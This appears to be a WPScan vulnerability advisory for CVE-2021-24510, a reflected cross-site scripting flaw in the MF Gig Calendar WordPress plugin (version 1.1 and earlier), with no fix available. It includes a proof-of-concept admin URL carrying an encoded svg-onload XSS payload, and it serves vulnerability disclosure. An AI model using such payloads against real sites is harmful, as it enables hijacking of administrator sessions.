WordPress Plugin Vulnerabilities

MF Gig Calendar <= 1.1 - Reflected Cross-Site Scripting (XSS)

Description

The plugin does not sanitise or escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue

Proof of Concept

https://example.comwp-admin/admin.php?page=mf_gig_calendar&action=edit&id=%22%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3B%3E%3C%22

Affects Plugins

mf-gig-calendar

No known fix - plugin closed

References

CVE

CVE-2021-24510

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Original Researcher

iohex

Submitter

iohex

Submitter twitter

iohehe

Verified

Yes

WPVDB ID

715721b0-13a1-413a-864d-2380f38ecd39

Timeline

Publicly Published

2021-08-17 (about 10 months ago)

Added

2021-08-17 (about 10 months ago)

Last Updated

2022-04-09 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin